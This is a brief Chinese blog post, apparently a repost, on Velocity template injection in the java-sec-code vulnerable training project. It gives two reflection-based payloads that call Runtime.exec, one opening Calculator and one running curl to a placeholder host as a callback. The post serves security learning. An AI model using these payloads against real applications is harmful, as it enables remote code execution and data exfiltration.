[Java-sec-code]Java velocity SSTI

Posted Y4tacker

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Java-sec-code]Java velocity SSTI相关的知识,希望对你有一定的参考价值。

文章目录

Java velocity

可以看一看这一篇文章
java velocity模板用法(替换、循环、if判断)
《Velocity 模板使用指南》中文版

SSTI

SSTI模板注入啥的都很清楚了,我们这里看看代码,在org/joychou/controller/SSTI.java下面

接收参数template并解析
这里官方给了一个payload

#set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("open -a Calculator")

当然由于本身有context.put放入了一些参数,通过java.lang.String也可以

$address.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl http://xxxx?a=4s589")

以上是关于[Java-sec-code]Java velocity SSTI的主要内容,如果未能解决你的问题,请参考以下文章

[Java-sec-code]PathTraversal学习

[Java-sec-code]PathTraversal学习

[Java-sec-code学习]SSRF

[Java-sec-code]SpEL表达式注入

[Java] 模板引擎 Velocity 随笔

velocity语法教程